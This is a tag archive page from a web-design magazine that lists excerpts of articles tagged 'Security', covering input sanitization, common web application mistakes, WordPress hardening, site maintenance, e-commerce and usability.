Menu Search
Jump to the content X

Posts Tagged ‘Security’.

We are pleased to present below all posts tagged with ‘Security’.

Keeping Web Users Safe By Sanitizing Input Data

In my last article, I spoke about several common mistakes that show up in web applications. Of these, the one that causes the most trouble is insufficient input validation/sanitization. In this article, I'm joined by my colleague Peter (evilops) Ellehauge in looking at input filtering in more depth while picking on a few real examples that we've seen around the web. As you'll see from the examples below, insufficient input validation can result in various kinds of code injection including XSS, and in some cases can be used to phish user credentials or spread malware.



To start with, we'll take an example[1] from one of the most discussed websites today. This example is from a site that hosts WikiLeaks material. Note that the back end code presented is not the actual code, but what we think it might be based on how the exploit works. The HTML was taken from their website. We think it's fair to assume that it's written in PHP as the form's action is index.php.


Common Security Mistakes in Web Applications

Web application developers today need to be skilled in a multitude of disciplines. It's necessary to build an application that is user friendly, highly performant, accessible and secure, all while executing partially in an untrusted environment that you, the developer, have no control over. I speak, of course, about the User Agent. Most commonly seen in the form of a web browser, but in reality, one never really knows what's on the other end of the HTTP connection.


There are many things to worry about when it comes to security on the Web. Is your site protected against denial of service attacks? Is your user data safe? Can your users be tricked into doing things they would not normally do? Is it possible for an attacker to pollute your database with fake data? Is it possible for an attacker to gain unauthorized access to restricted parts of your site? Unfortunately, unless we're careful with the code we write, the answer to these questions can often be one we'd rather not hear.


What Is The Worst Design or Programming Mistake You’ve Ever Made?

Mistakes are made every day in the design and development world. It’s nothing to be ashamed of; it happens. In fact, mistakes are one of the most powerful learning tools at our disposal. Our mistakes impart important lessons that we carry with us as we continue to hone our skill set. Own your mistakes. Never shy away from them; they are the milestones in our development.


So often we view mistakes negatively and let them get us down. We believe they indicate failure and that our otherwise perfect record will be forever marred. No one is perfect; we all make mistakes. They indicate failure only if we fail to learn from them. The online design and development community is a wonderful resource in this respect. Not only are members open about their mistakes, they share their experiences as learning opportunities for others — this is helpful for those of us who have not yet suffered through the same bumps in the road.

With this in mind, we turned again to our Twitter followers and Facebook fans to find out about the worst design or programming mistakes they have ever made. Now we share them with you, our readers, so that we can all learn from them and avoid making the same mistakes.


10 Useful WordPress Security Tweaks

Security has always been a hot topic. Offline, people buy wired homes, car alarms and gadgets to bring their security to the max. Online, security is important, too, especially for people who make a living from websites and blogs. In this article, we'll show you some useful tweaks to protect your WordPress-powered blog.


When you fail to log into a WordPress blog, the CMS displays some info telling you what went wrong. This is good if you've forgotten your password, but it might also be good for people who want to hack your blog. So, why not prevent WordPress from displaying error messages on failed log-ins?


10 Ways To Beef Up Your Website’s Security

Hacker attacks across the web are getting more sophisticated every day – after all, they have to. With the increased sophistication of anti-virus protection, firewalls, and application-based updates, hackers who want to stay in business have needed to get more creative. And they have, responding with increasingly sophisticated attacks that have forced the online security industry to scramble to keep up.

So how do the hackers stay ahead of the security experts? One reason is obvious – if they didn't, they'd be out of a job. Another reason is institutional – a lone hacker working in a basement will be more innovative and faster moving than a large software company, thus more likely to come up with effective hacks.


Getting Started With E-Commerce: Your Options When Selling Online

The world of online sales, whether of products or services, can be daunting at first; the options seem confusing and the information conflicted. Yet as the designer or developer of an online store, you will need to guide your client through the maze of choices in order to get it up and running.

I have developed many e-commerce websites during my career as a Web developer. I've used and modified off-the-shelf software and have also developed custom solutions — so I know from experience that there are a number of important questions to answer before presenting possible solutions to a client. Getting all the pertinent information up front is vital if such a project is to run smoothly, and it can save you from delays during the process. It can also help you advise the client on whether they need a full custom cart or an open-source or off-the-shelf product.


This article responds to some questions you should be asking of your client before putting together a proposal for the development of an e-commerce website. I'll explain the most important things to think about in terms of taking payments and credit card security. It should give you enough information to be able to guide your client and to look up more detailed information about the aspects that apply to your particular situation.


Case-Study: Deconstructing Popular Websites

In our past articles, we've experimented with better ways to engage users on web pages with CSS3. We love getting into the nuts and bolts of web design by showing off some nifty coding tricks. In this article we'll take a step back to provide some reasoning for designers to embark on that next redesign.


Great web design happens with sound user needs, solid business goals and focused metrics. Learning how to deconstruct a website is an important step in building a plan that aligns the company vision with the needs of users. A good review will put the focus on the profitability of the business.


Web Security: Are You Part Of The Problem?

Website security is an interesting topic and should be high on the radar of anyone who has a Web presence under their control. Ineffective Web security leads to all of the things that make us hate the Web: spam, viruses, identity theft, to name a few.

Web Vulnerabilities Q1/Q2 2009.

The problem with Web security is that, as important as it is, it is also very complex. I am quite sure that some of you reading this are already part of an network of attack computers and that your servers are sending out spam messages without you even knowing it. Your emails and passwords have been harvested and resold to people who think you need either a new watch, a male enhancement product or a cheap mortgage. Fact is, you are part of the problem and don't know what you did to cause it.

Disclaimer: the things we'll talk about in this article today won't make you a security expert, just as buying a Swiss Army knife won't make you a locksmith or buying a whip won't make you a lion tamer. The purpose here is to raise awareness and perhaps make some of that security mumbo-jumbo a bit more understandable to you.


Website Maintenance Tips for Front-End Developers

One of the biggest advantages of online media over print is the ability to change, update, and enhance online media at virtually anytime, with virtually no negative side effects. In fact, if a website or web application does not continually offer its users an ever-evolving and growing experience, that site or application would soon become insecure, unusable, and out of date.

Have you beautified your code, validated your markup, and made your XHTML more semantic? Have you implemented basic SEO best practices, spell-checked content, and removed legacy code? Have you ensured JavaScript is unobtrusive, applied the principle of graceful degradation, and minimized the use of Flash? If you've done all those things (and possibly more), what comes next? Are there things you can do to improve your site's overall effectiveness beyond those?


In this article, we will discuss ways that web designers and front-end coders can keep their websites relevant, timely, and accessible long after a site's launch. This guide goes beyond simple text and graphic updates, common "best practices" for CSS and XHTML, or other things you might see in a typical website checklist. We'll expand on many of the basics, and provide some effective tips for website maintenance geared towards front-end designers and coders.


Increasing Online Sales: Simple Usability Problems To Avoid

When designing an online store, you have to consider many different types of customers: repeat customers, first-timers, people in a rush, etc. One thing that would help all of them is optimum usability. You can achieve this in a variety of ways, starting with eliminating the most common usability problems from your website. Fixing any one of the following eight common usability problems will get you started on the path to usability and user-experience heaven and, ultimately, more sales.

Get Satisfaction has a prominent search box with a hardly usable drop-down menu. The search box appears only on the front page.

A solid information architecture can do wonders for people who enjoy browsing, but some customers just want to find what they're looking for, buy it and get out. These people are search dominant, and as soon as they land on your website, they will start searching. And if they can't find your search box, they will leave. As simple as that.


↑ Back to top